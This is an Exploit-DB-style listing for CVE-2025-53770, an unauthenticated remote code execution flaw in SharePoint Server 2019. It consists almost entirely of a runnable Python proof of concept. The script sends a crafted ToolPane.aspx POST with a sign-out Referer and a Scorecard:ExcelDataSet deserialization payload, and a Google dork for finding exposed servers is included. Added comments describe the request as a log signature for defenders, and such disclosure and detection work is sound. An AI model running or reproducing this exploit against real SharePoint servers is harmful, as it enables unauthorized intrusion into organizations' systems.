
Microsoft SharePoint Server 2019 (16.0.10383.20020) - Remote Code Execution (RCE)

🗓️ 11 Aug 2025 00:00:00 · Reported by Agampreet Singh · Type: exploitdb · 🔗 www.exploit-db.com · 👁 389 Views

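SharePoint Server 2019 remote code execution via unsafe deserialization reachable through ToolPane.aspx (CVE-2025-53770). The listing below sends a single crafted POST to `/_layouts/15/ToolPane.aspx` and inspects the response for a `CompressedDataTable` value; the request shape it shows (that path, a `/_layouts/SignOut.aspx` Referer, and the `MSOTlPn_DWP` form field) is what defenders should look for in web logs alongside applying the vendor fix for this CVE.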

Code
# Exploit Title: Microsoft SharePoint Server 2019 – Remote Code Execution (RCE)
# Google Dork: intitle:"Microsoft SharePoint" inurl:"/_layouts/15/ToolPane.aspx"
# Date: 2025-08-07
# Exploit Author: Agampreet Singh (RedRoot Tool Maker – https://github.com/Agampreet-Singh/RedRoot)
# Vendor Homepage: https://www.microsoft.com
# Software Link: https://www.microsoft.com/en-us/microsoft-365/sharepoint/collaboration
# Version: SharePoint Server 2019 (16.0.10383.20020)
# Tested on: Windows Server 2019 (x64)
# CVE: CVE-2025-53770

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

"""
Exploit Author: Agampreet Singh (RedRoot Tool Maker)
RedRoot Repository: https://github.com/Agampreet-Singh/RedRoot
This PoC demonstrates unauthenticated RCE by exploiting unsafe deserialization in SharePoint’s ToolPane.aspx via the Scorecard:ExcelDataSet control.
FOR EDUCATIONAL AND AUTHORIZED SECURITY TESTING PURPOSES ONLY.
"""

import requests
import base64
import gzip
import re
import sys

def exploit_sharepoint(target_url: str) -> None:
    """Send one crafted ToolPane.aspx POST and report what the server returns.

    The request body carries an ASP.NET markup fragment that registers the
    ``Microsoft.PerformancePoint.Scorecards`` namespace and embeds a
    ``Scorecard:ExcelDataSet`` control whose ``CompressedDataTable``
    attribute is a base64-encoded gzip blob.  The function then searches the
    HTTP response for a ``CompressedDataTable`` value, base64-decodes and
    gunzips it, writes the text to a fixed file under ``/tmp`` and prints
    which of a short list of marker strings it contains.

    NOTE(review): the content of the embedded blob is not readable from this
    listing.  The marker list at the end (``IntruderScannerDetectionPayload``)
    suggests it is a scanner-style detection marker rather than a command
    payload -- decode it offline and confirm before relying on that.

    Args:
        target_url: Base URL of the SharePoint site with no trailing slash;
            the ToolPane.aspx path is appended to it directly.

    Returns:
        None.  Results are reported on stdout and, on success, written to
        ``/tmp/sharepoint_decoded_payload.txt``.  All exceptions are caught
        and printed rather than propagated.
    """
    print(f"[+] Target: {target_url}")

    # Request shape: a Referer naming the sign-out page plus a form-encoded
    # body.  The module docstring describes the issue as unauthenticated;
    # presumably this Referer is what lets the request through without a
    # session -- confirm against the vendor advisory.  For defenders, a POST
    # to ToolPane.aspx carrying this Referer is a useful log signature.
    headers = {
        "Referer": "/_layouts/SignOut.aspx",
        "Content-Type": "application/x-www-form-urlencoded"
    }

    # Markup submitted as a web-part definition.  Kept byte-for-byte: the
    # CompressedDataTable attribute is the base64+gzip data the server-side
    # control is expected to process.
    payload = '''
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
  <ProgressTemplate>
    <div class="divWaiting">
      <Scorecard:ExcelDataSet CompressedDataTable="H4sIAADEfmgA/4WRX2uzMBTG7/0Ukvs06ihjQb3ZbgobG1TYeO9OY6yBJpGTdHbfvudVu44x6FUkPn9+PEnK1nTdHuV8gE1P9uCCtKGFCBU7opNB9dpC4NYo9MF3kStvJen4rGKLZ4645bkU8c+c1Umalp33/0/62gGmC45pK9bA7qBZOpdI9OMrtpryM3ZR9RAee3B7HSpmXNAYdTuFTnGDVwvZKZiK9TEOUohxHFfj3crjXhRZlouPl+ftBMspIYJTVHlxEcQt13cdFTY6xHeEYdB4vaX7jet8vXERj8S/VeCcxicdtYrGuzf4OnhoSzGpftoaYykQ7FAXWbHm2T0v8qYoZP4g1+t/pbj+vyKIPxhKQUssEwvaeFpdTLOX4tfz18kZONVdDRICAAA=" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
    </div>
  </ProgressTemplate>
</asp:UpdateProgress>
'''.strip()

    # Two form fields: the page URI and the markup above.  Both field names
    # appear in the POST body and can be matched by request-inspection rules.
    data = {
        "MSOTlPn_Uri": target_url,
        "MSOTlPn_DWP": payload
    }

    try:
        # verify=False turns off TLS certificate validation, so the response
        # is not authenticated: anything on the network path can supply it.
        # Everything parsed below must be treated as untrusted input.
        response = requests.post(
            f"{target_url}/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx",
            headers=headers,
            data=data,
            verify=False,
            timeout=10
        )

        # Only a 200 is processed further; any other status ends the run.
        if response.status_code != 200:
            print(f"[-] Unexpected HTTP response: {response.status_code}")
            return

        # Captures everything after CompressedDataTable=" up to the next '&'.
        # NOTE(review): this presumably relies on the closing quote being
        # HTML-encoded in the response; with a raw '"' the capture runs past
        # the attribute and the decode below fails or yields garbage.
        match = re.search(r'CompressedDataTable="([^&]+)', response.text)
        if not match:
            print("[-] No CompressedDataTable found in response.")
            return

        compressed_b64 = match.group(1)
        print("[+] Compressed payload extracted.")

        # Server-controlled data: gzip.decompress has no output-size cap, so
        # a hostile or honeypot endpoint can return a small blob that expands
        # to a very large buffer.  Decode errors land in the except below.
        compressed_data = base64.b64decode(compressed_b64)
        decompressed_data = gzip.decompress(compressed_data)

        # errors='ignore' silently drops bytes that are not valid UTF-8, so
        # the saved text may not match the decompressed bytes exactly.
        decoded_output = decompressed_data.decode('utf-8', errors='ignore')
        print("[+] Payload decoded successfully. Dumping to file...")

        # Fixed, predictable name in a shared temp directory; open(..., "w")
        # truncates an existing file and follows symlinks.  Run this only
        # from an isolated, single-user analysis host.
        output_file = "/tmp/sharepoint_decoded_payload.txt"
        with open(output_file, "w", encoding="utf-8") as f:
            f.write(decoded_output)

        print(f"[+] Saved to {output_file}")
        print("[*] Summary Matches:")
        # Plain substring checks; a hit shows the string is present in the
        # decoded text, nothing more.
        for keyword in ["IntruderScannerDetectionPayload", "ExcelDataSet", "divWaiting", "ProgressTemplate", "Scorecard"]:
            if keyword in decoded_output:
                print(f"  - Found: {keyword}")

    # Catch-all: network errors, base64/gzip failures and file errors are all
    # reported through the same message, so the cause must be read from the
    # exception text.
    except Exception as e:
        print(f"[!] Exploit failed: {e}")

if __name__ == "__main__":
    # Exactly one positional argument is accepted: the base URL of the site
    # being checked.  Anything else prints the usage line and exits with 1.
    cli_args = sys.argv[1:]
    if len(cli_args) != 1:
        print("Usage: python3 cve-2025-53770.py https://target.com")
        sys.exit(1)
    (raw_url,) = cli_args
    # Trim surrounding whitespace and any trailing slash, because the
    # function appends its own path directly to this value.
    target = raw_url.strip().rstrip('/')
    exploit_sharepoint(target)
